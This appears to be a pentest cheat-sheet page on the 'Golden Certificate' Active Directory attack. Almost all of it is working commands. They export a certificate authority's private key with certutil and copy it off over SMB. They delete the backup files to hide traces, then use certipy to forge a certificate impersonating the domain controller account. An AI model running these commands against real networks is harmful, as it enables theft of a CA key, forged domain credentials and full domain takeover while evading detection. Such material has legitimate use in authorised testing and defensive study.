Golden Certificate

Backup and extract manually:

Cmd > certutil -backupkey -f -p Passw0rd! C:\Windows\CABackup
$ smbclient.py -k -no-pass CA01.megacorp.local
# use c$
# cd windows/CABackup
# get CorpCA.p12
# rm CorpCA.p12
# cd ..
# rmdir CABackup

P12 to PFX:

$ certipy cert -pfx CorpCA.p12 -password 'Passw0rd!' -export -out CorpCA.pfx

Get CRL from the DC:

$ </dev/null openssl s_client -connect <DC_IP>:636 | openssl x509 > dc.crt

Certipy

$ certipy ca -backup -ca CorpCA -k -no-pass -target CA01.megacorp.local -dc-ip 192.168.1.11 -ns 192.168.1.11
$ certipy forge -ca-pfx CorpCA.pfx -upn 'DC01$@megacorp.local' (or -dns DC01.megacorp.local) -subject 'CN=DC01,OU=Domain Controllers,DC=megacorp,DC=local' -crl 'ldap://***'

Last updated